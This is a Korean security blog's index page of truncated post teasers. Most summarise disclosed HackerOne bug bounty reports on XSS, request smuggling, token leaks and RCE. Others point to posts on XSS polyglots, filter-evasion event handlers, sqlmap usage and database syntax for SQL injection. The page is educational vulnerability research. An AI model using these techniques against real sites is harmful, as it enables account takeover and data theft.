Security
![버그바운티(Bug Bounty) Write-up / Mass account takeovers [Slack]](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcpEzRc%2FbtqCUbE67ng%2FP4JyFksKTjHg1VEqpmcZj0%2Fimg.png)
버그바운티(Bug Bounty) Write-up / Mass account takeovers [Slack]
https://hackerone.com/reports/737140 Slack disclosed on HackerOne: Mass account takeovers using HTTP... This researcher exploited an HTTP Request Smuggling bug on a Slack asset to perform a CL.TE-based hijack onto neighboring customer requests. This hijack forced the victim into an open-redirect that forwarded the victim onto the researcher's collaborator cl hackerone.com 해당 버그헌터는 HTTP Request S..
![버그바운티(Bug Bounty) Write-up / retrieving account [PayPal]](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKlKC8%2FbtqBp4yTjRc%2F63vOHI0JfSzjqOEZBFzrX0%2Fimg.png)
버그바운티(Bug Bounty) Write-up / retrieving account [PayPal]
https://hackerone.com/reports/739737 PayPal disclosed on HackerOne: Token leak in security challenge... A bug was identified whereby sensitive, unique tokens were being leaked in a JS file used by the recaptcha implementation. In certain cases, a user must solve a CAPTCHA challenge after authenticating. When the security challenge is completed, the authentic hackerone.com 15,300 달러 바운티를 받은건 입니다...
![버그바운티(Bug Bounty) Write-up / RCE [Twitter]](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmbOzX%2FbtqxQUUTl8u%2FVgFO07fNebNe3CMK0uVJ00%2Fimg.png)
버그바운티(Bug Bounty) Write-up / RCE [Twitter]
https://hackerone.com/reports/591295 Twitter disclosed on HackerOne: Potential pre-auth RCE on Twitter VPN Hi, we(Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we are doing a research about SSL VPN security, and found several critical vulnerabilities on Pulse Secure SSL VPN! We have reported to vendor and [patches](https://kb hackerone.com 무려 2만달러의 바운티를 받은건이네요..
![버그바운티(Bug Bounty) Write-up / Stored XSS [Shopify]](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FRp3Du%2FbtqvL89t10c%2FvDTYTPRkaMIjokqjQFhkRk%2Fimg.png)
버그바운티(Bug Bounty) Write-up / Stored XSS [Shopify]
https://hackerone.com/reports/532643 Shopify disclosed on HackerOne: Stored - XSS Hello Security Team, I have Found Stored XSS Vulnerability POC : Step1: Go to https://app.oberlo.com/suppliers Step2: Click on any product you will be redirected to URL as i have given for example https://app.oberlo.com/suppliers/8/products/488813?referral hackerone.com 오늘도 역시나 XSS를 들고왔습니다. 당분간 XSS만 쓸것 같네요. XSS에 바운..
![버그바운티(Bug Bounty) Write-up / Stored XSS [AAF]](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbsi1ey%2FbtqvK5LBIk6%2F1WVrP2FCikeGluRaV0nto0%2Fimg.png)
버그바운티(Bug Bounty) Write-up / Stored XSS [AAF]
https://hackerone.com/reports/411690 Alliance of American Football disclosed on HackerOne: Stored xss... Dear Team, **Summary:** [add summary of the vulnerability] After looking into https://shop.aaf.com/Order/step1/index.cfm i get to know that there is address field is vulnerable to stored xss which can lead to steal any user's cookie and can lead to complet hackerone.com Stored XSS 을 이용하여 바운티를..
버그바운티(Bug Bounty) Write-up / Stored XSS
https://hackerone.com/reports/415484 Shopify disclosed on HackerOne: Stored xss # Description : WAF cut html tages but when put before tages we can bypass it :) . #Step to reproduce : 1-Open your store account 2-Navigate to https://xxx.myshopify.com/admin/settings/general 3-Put your street address xss payload (xss"> hackerone.com 오늘도 역시 XSS로 바운티를 받은건을 가져 왔습니다. 날려먹어서 다시씀 Stored XSS를 성공시켜서 무려 1000..
버그바운티(Bug Bounty) Write-up / Path Disclosure ($50)
https://hackerone.com/reports/503804 Unikrn disclosed on HackerOne: Path Disclosure Vulnerability... Hello, there is a path discovery on the server. https://crm.unikrn.com/plugins/MauticZapierBundle/MauticZapierBundle.php https://crm.unikrn.com/plugins/MauticCloudStorageBundle/MauticCloudStorageBundle.php and other scripts at https://crm.unikrn.com/plugin hackerone.com 매우 간단한 보고서 입니다. 이런것도 바운티가 ..
버그바운티(Bug Bounty) Write-up / POST Based XSS ($500)
https://hackerone.com/reports/429679 Shopify disclosed on HackerOne: POST-based XSS on apps.shopify.com Hello Shopify team! I found a post-based XSS which may be shared to other users and occurs in firefox, IE, Edge. How to reproduce: 1. at partners.shopify.com go to apps -> choose one -> more actions -> create shopify app store listing 2. you will get redir hackerone.com 오늘도 역시 XSS 건 입니다. XSS가 ..
XSS Polyglots ( 강력한 한줄 XSS 공격 구문)
XSS Polyglots XSS하면 떠오르는 구문이 있죠 구문으로 성공하기 보다. 앞의 구문을 마무리 하기위해 "> 오른쪽 꺽쇠를 넣어준다던지 아니면 --> 를 써서 주석처리를 해버린다던지 하여서 "> 이런식으로 공격코드를 작성하게 됩니다. 만약에 주입이 되는곳에 어떤 취약점이 있는지 모르는 상황일때, 즉 blind XSS를 해야 할 경우, 여러번의 공격 Request를 서버로 보내서 추측해봐야 합니다. / 도 넣어보고.. "> 도 넣어보고 .. 도넣어보고 이런식으로요. 그런데 이런 작업을 한방에 해줄 수 있는 공격구문이 있는데요. 이걸 Polyglots 라고 부릅니다. 여러번 Request를 하는것보다 한번의 요청으로 하는게 당연히 좋겠죠. 먼저 OWASP 홈피에 나와있는 Polyglots 공격코드를 ..
XSS Attack 에 사용될 수 있는 이벤트 핸들러
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet XSS Filter Evasion Cheat Sheet - OWASP Last revision (mm/dd/yy): 02/23/2019 Introduction This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, www.owasp.org FSCommand() (attacker can ..
sqlmap 모든 옵션 및 사용법 정리
https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmapproject/sqlmap Automatic SQL injection and database takeover tool - sqlmapproject/sqlmap github.com
버그바운티(Bug Bounty) Write-up / DOM Based XSS ($500)
https://hackerone.com/reports/474656 HackerOne disclosed on HackerOne: Cross-site Scripting (XSS) on... Dear HackerOne team, **Summary:** I found DOM XSS at endpoint `https://www.hackerone.com/careers`, but can not bypass CSP. It's work on IE and Edge. ### Steps To Reproduce - JS file is "Masonry js file", vulnerability code: ```javascript //Checking for pot hackerone.com 오늘도 역시 DOM Based XSS 에 ..
버그바운티(Bug Bounty) Write-up / DOM Based XSS ($500)
https://hackerone.com/reports/398054 HackerOne disclosed on HackerOne: DOM Based XSS in... **Summary:** The Marketo contact form available on the www.hackerone.com website is affected by a cross-site scripting vulnerability, caused by an insecure 'message' event listener installed on the page. Whilst this could allow an attacker to execute JavaS hackerone.com 작성자는 DOM Based XSS를 발생시켰고, 바운티로 500달..
데이터베이스(DB) 종류 별 명령어 정리2
MS-SQL 데이터베이스 내장함수 SUBSTRING(문자열, 시작번호, 자를문자수) LEN(문자열) ASCII(문자) CHAR(숫자) - 아스키코드에 대한 문자 반환 STR(숫자) 주석처리 구문 -- MySQL 데이터베이스 내장함수 SUBSTR(문자열, 시작번호, 자를문자수) LENGTH(문자열) : 바이트 수 CHAR_LENGTH(문자열) : 글자 수 ASCII(문자열) - 첫번째 문자에 대한 ASCII 값 반환 CHAR(숫자1,숫자2,...) - 아스키코드에 대한 문자 반환 주석처리 구문 # -- Maria DB 데이터베이스 내장함수 SUBSTR(문자열, 시작번호, 자를문자수) LENGTH(문자열) : 바이트 수 CHAR_LENGTH(문자열) : 글자 수 ASCII(문자열) - 첫번째 문자에 대한 A..
버그바운티(Bug Bounty) Write-up / Stored XSS ($750)
https://hackerone.com/reports/484434 Imgur disclosed on HackerOne: Stored XSS on imgur profile Hello, I submitted a report on imgur, but the staff marked it as duplicate. #482841 I reviewed the report of the first submitted report. #381553 We are on the same situation and his case is already fixed because I tried visiting his site too which is https hackerone.com Stored XSS를 이용하여 650달러를 바운티 받은 건..